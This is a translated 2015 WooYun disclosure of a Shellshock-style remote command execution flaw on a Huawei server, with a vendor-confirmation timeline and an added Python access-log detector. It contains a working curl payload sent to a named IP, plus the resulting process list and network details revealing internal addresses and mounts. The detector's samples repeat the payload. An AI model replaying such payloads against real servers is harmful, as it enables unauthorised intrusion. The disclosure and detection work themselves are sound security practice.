
Vulnerability summary

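Bug ID: wooyun-2015-0113282

Title: Remote command execution vulnerability on a Huawei server

Vendor: Huawei Technologies Co., Ltd.

Author: 猪猪侠

Submitted: 2015-05-10 19:08

Fixed: 2015-06-24 22:40

Made public: 2015-06-24 22:40

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]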



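Vulnerability details

Disclosure status:

2015-05-10: Details reported to the vendor; awaiting vendor handling
2015-05-10: Vendor confirmed; details disclosed to the vendor only
2015-05-20: Details disclosed to core white hats and experts in related fields
2015-05-30: Details disclosed to regular white hats
2015-06-09: Details disclosed to trainee white hats
2015-06-24: Details disclosed to the public

Brief description:

Remote command execution vulnerability on a Huawei server

Detailed description: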

curl http://122.11.38.69:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k

UID        PID  PPID  C STIME TTY          TIME CMD
root 1 0 0 2012 ? 00:10:41 init [3]
root 2 0 0 2012 ? 00:00:00 [kthreadd]
root 3 2 0 2012 ? 00:00:35 [migration/0]
root 4 2 0 2012 ? 00:02:56 [ksoftirqd/0]
root 5 2 0 2012 ? 00:21:44 [events/0]
root 6 2 0 2012 ? 00:00:00 [cpuset]
root 7 2 0 2012 ? 00:00:00 [khelper]
root 8 2 0 2012 ? 00:00:00 [netns]
root 9 2 0 2012 ? 00:00:00 [async/mgr]
root 10 2 0 2012 ? 00:00:00 [pm]
root 11 2 0 2012 ? 00:00:00 [xenwatch]
root 12 2 0 2012 ? 00:00:00 [xenbus]
root 14 2 0 2012 ? 00:00:54 [migration/1]
root 15 2 0 2012 ? 00:01:11 [ksoftirqd/1]
root 16 2 0 2012 ? 00:22:34 [events/1]
root 17 2 0 2012 ? 00:00:50 [migration/2]
root 18 2 0 2012 ? 00:01:30 [ksoftirqd/2]
root 19 2 0 2012 ? 00:27:36 [events/2]
root 20 2 0 2012 ? 00:00:44 [migration/3]
root 21 2 0 2012 ? 00:00:56 [ksoftirqd/3]
root 22 2 0 2012 ? 01:27:20 [events/3]
root 23 2 0 2012 ? 00:01:27 [sync_supers]
root 24 2 0 2012 ? 00:01:42 [bdi-default]
root 25 2 0 2012 ? 00:00:00 [kintegrityd/0]
root 26 2 0 2012 ? 00:00:00 [kintegrityd/1]
root 27 2 0 2012 ? 00:00:00 [kintegrityd/2]
root 28 2 0 2012 ? 00:00:00 [kintegrityd/3]
root 29 2 0 2012 ? 00:00:00 [kblockd/0]
root 30 2 0 2012 ? 00:00:00 [kblockd/1]
root 31 2 0 2012 ? 00:00:00 [kblockd/2]
root 32 2 0 2012 ? 00:00:00 [kblockd/3]
root 33 2 0 2012 ? 00:00:00 [kseriod]
root 38 2 0 2012 ? 00:00:00 [khungtaskd]
root 39 2 0 2012 ? 00:00:00 [kswapd0]
root 40 2 0 2012 ? 00:00:00 [aio/0]
root 41 2 0 2012 ? 00:00:00 [aio/1]
root 42 2 0 2012 ? 00:00:00 [aio/2]
root 43 2 0 2012 ? 00:00:00 [aio/3]
root 44 2 0 2012 ? 00:00:00 [crypto/0]
root 45 2 0 2012 ? 00:00:00 [crypto/1]
root 46 2 0 2012 ? 00:00:00 [crypto/2]
root 47 2 0 2012 ? 00:00:00 [crypto/3]
root 49 2 0 2012 ? 00:00:00 [kpsmoused]
root 50 2 0 2012 ? 00:00:00 [xenfb thread]
root 153 2 0 2012 ? 00:00:00 [net_accel/0]
root 154 2 0 2012 ? 00:00:00 [net_accel/1]
root 155 2 0 2012 ? 00:00:00 [net_accel/2]
root 156 2 0 2012 ? 00:00:00 [net_accel/3]
root 459 2 0 2012 ? 00:03:43 [kjournald]
root 530 1 0 2012 ? 00:00:00 /sbin/udevd --daemon
root 865 2 0 2012 ? 00:00:00 [kstriped]
root 949 2 0 2012 ? 00:05:57 [kjournald]
100 1389 1 0 2012 ? 00:01:37 /bin/dbus-daemon --system
101 1460 1 0 2012 ? 00:00:26 /usr/sbin/hald --daemon=yes
root 1463 1 0 2012 ? 00:00:24 /usr/sbin/console-kit-daemon
root 1526 1460 0 2012 ? 00:00:00 hald-runner
root 3290 1 0 2013 ? 00:00:00 bash -c umount -l /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/file
root 3314 3290 0 2013 ? 00:00:15 umount -l /opt/huawei/ttgo/file/fileup
root 3320 1 0 2013 ? 00:00:13 df -h
root 3369 1 0 2013 ? 00:00:00 bash -c umount -l /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/file
root 3393 3369 0 2013 ? 00:00:00 umount -l /opt/huawei/ttgo/file/fileup
root 3565 1 0 2013 ? 00:00:00 sh /etc/init.d/boot.local
root 3590 3565 0 2013 ? 00:00:00 mount 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/
root 3591 3590 0 2013 ? 00:00:00 /sbin/mount.nfs 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/ -o rw
root 3689 1 0 2012 ? 00:00:30 /sbin/auditd -s disable
root 3691 3689 0 2012 ? 00:01:15 /sbin/audispd
root 3692 2 0 2012 ? 00:00:00 [kauditd]
root 3713 1 0 2012 ? 00:01:09 /sbin/rpcbind
root 3929 1 0 2012 ? 00:00:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pid
root 3968 1 0 2012 ? 02:02:08 /usr/sbin/irqbalance
root 3981 1 0 2012 ? 00:08:10 /usr/sbin/nscd
root 4011 1 0 2012 ? 00:09:24 /usr/sbin/cron
root 4026 1 0 2012 tty1 00:00:00 /sbin/mingetty --noclear tty1
root 4027 1 0 2012 tty2 00:00:00 /sbin/mingetty tty2
root 4028 1 0 2012 tty3 00:00:00 /sbin/mingetty tty3
root 4029 1 0 2012 tty4 00:00:00 /sbin/mingetty tty4
root 4030 1 0 2012 tty5 00:00:00 /sbin/mingetty tty5
root 4031 1 0 2012 tty6 00:00:00 /sbin/mingetty tty6
ttgo 6092 1 0 2014 ? 21:53:16 /opt/huawei/ttgo/push/jdk/bin/java -Djava.util.logging.config.file=/opt/huawei/ttgo/push/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/huawei/ttgo/push/tomcat/endorsed -classpath /opt/huawei/ttgo/push/tomcat/bin/bootstrap.jar:/opt/huawei/ttgo/push/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/huawei/ttgo/push/tomcat -Dcatalina.home=/opt/huawei/ttgo/push/tomcat -Djava.io.tmpdir=/opt/huawei/ttgo/push/tomcat/temp org.apache.catalina.startup.Bootstrap start
root 7944 2 0 2012 ? 00:00:08 [rpciod/0]
root 7945 2 0 2012 ? 00:00:01 [rpciod/1]
root 7946 2 0 2012 ? 00:00:01 [rpciod/2]
root 7947 2 0 2012 ? 00:00:00 [rpciod/3]
root 7951 2 0 2012 ? 00:00:00 [kslowd000]
root 7952 2 0 2012 ? 00:00:00 [kslowd001]
root 7955 2 0 2012 ? 00:00:00 [nfsiod]
root 10152 2 0 2012 ? 00:00:04 [kjournald]
root 10836 1 0 2014 ? 00:02:02 /sbin/syslog-ng
root 10839 1 0 2014 ? 00:00:00 /sbin/klogd -c 1 -x
ttgo 11297 11463 0 17:51 ? 00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
ttgo 11463 1 0 2012 ? 01:56:36 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
ttgo 11466 11463 0 2012 ? 00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
root 12243 2 0 18:48 ? 00:00:00 [flush-202:16]
ttgo 12249 11466 0 18:48 ? 00:00:00 /bin/sh /opt/huawei/ttgo/push/cloudServer/apache/cgi-bin/test-cgi
ttgo 12250 12249 0 18:48 ? 00:00:00 /bin/ps -ef
root 16017 1 0 2012 ? 00:00:00 rpc.statd --no-notify
root 16026 2 0 2012 ? 00:00:00 [lockd]
zabbix 21920 1 0 2013 ? 00:00:00 /opt/zabbix/sbin/zabbix_agentd
zabbix 21921 21920 0 2013 ? 11:56:03 /opt/zabbix/sbin/zabbix_agentd
zabbix 21922 21920 0 2013 ? 00:24:17 /opt/zabbix/sbin/zabbix_agentd
zabbix 21923 21920 0 2013 ? 00:24:17 /opt/zabbix/sbin/zabbix_agentd
zabbix 21924 21920 0 2013 ? 00:24:16 /opt/zabbix/sbin/zabbix_agentd
zabbix 21925 21920 0 2013 ? 09:52:21 /opt/zabbix/sbin/zabbix_agentd
root 22136 1 0 2012 ? 00:00:00 /sbin/agetty -L 9600 xvc0 xterm
root 22368 2 0 2012 ? 00:10:55 [flush-202:0]
ntp 23389 1 0 2012 ? 00:45:34 /usr/sbin/ntpd -p /var/run/ntp/ntpd.pid -g -u ntp:ntp -i /var/lib/ntp -c /etc/ntp.conf
root 31936 1 0 2013 ? 00:00:13 /var/ossec/bin/ossec-execd
ossec 31940 1 0 2013 ? 00:26:07 /var/ossec/bin/ossec-agentd
root 31944 1 0 2013 ? 00:14:32 /var/ossec/bin/ossec-logcollector
root 31948 1 0 2013 ? 2-04:11:29 /var/ossec/bin/ossec-syscheckd

Proof of vulnerability:

eth0      Link encap:Ethernet  HWaddr 00:16:3E:0B:20:70  
inet addr:10.11.32.112 Bcast:10.11.32.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:622434337 errors:0 dropped:0 overruns:0 frame:0
TX packets:405783654 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:51098113331 (48730.9 Mb) TX bytes:32920068898 (31395.0 Mb)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:362 errors:0 dropped:0 overruns:0 frame:0
TX packets:362 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:33120 (32.3 Kb) TX bytes:33120 (32.3 Kb)

Remediation:

Delete

Copyright notice: when reposting, please credit the source 猪猪侠@乌云
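
A log check for the kind of request shown in this report, added here as an example and not part of the original report: it flags access-log lines whose request line, Referer or User-Agent carries the bash function-definition prefix `() {`, and marks hits that reached a `/cgi-bin/` path with status 200. The Apache "combined" log format, the names `scan`, `FUNC_DEF` and `COMBINED`, and the sample lines are assumptions made for the example.

```python
import re

# Bash parsed an environment value beginning "() {" as a function definition,
# and CGI copies request headers (User-Agent, Referer, ...) into the environment.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

# Assumed format: Apache "combined" access log.
FIELD = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + FIELD + r' (\d{3}) \S+ ' + FIELD + ' ' + FIELD)

# Constructed sample lines (documentation addresses), not taken from the report.
SAMPLE_LOG = """\
192.0.2.10 - - [10/May/2015:18:48:01 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 200 512 "-" "() { foo;};echo;/bin/ps -ef"
192.0.2.11 - - [10/May/2015:18:49:12 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.12 - - [10/May/2015:18:50:30 +0800] "GET /static/app.js HTTP/1.1" 404 0 "() { :; }; echo probe" "curl/7.40.0"
192.0.2.13 - - [10/May/2015:18:51:44 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 200 498 "-" "curl/7.40.0"
192.0.2.14 - - [10/May/2015:18:52:03 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 200 77 "-" "() { x;};echo
"""

def scan(log_text):
    """Return one finding per log line that carries a function-definition prefix."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED.match(line)
        if m is None:
            # Unparseable lines are still checked so odd quoting cannot hide a hit.
            if FUNC_DEF.search(line):
                findings.append({"line": lineno, "host": None,
                                 "fields": ["raw"], "cgi": False})
            continue
        host, request, status, referer, agent = m.groups()
        named = {"request": request, "referer": referer, "agent": agent}
        fields = [name for name, value in named.items() if FUNC_DEF.search(value)]
        if not fields:
            continue
        parts = request.split()
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno, "host": host, "fields": fields,
            # A hit on a CGI path that returned 200 means the handler ran: triage first.
            "cgi": path.startswith("/cgi-bin/") and status == "200",
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows only that the pattern was sent; whether commands ran depends on whether the bash behind the CGI handler was patched.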


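Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-05-10 22:38

Vendor reply:

The famous 猪猪侠! Thank you for the heads-up.

Latest status:

None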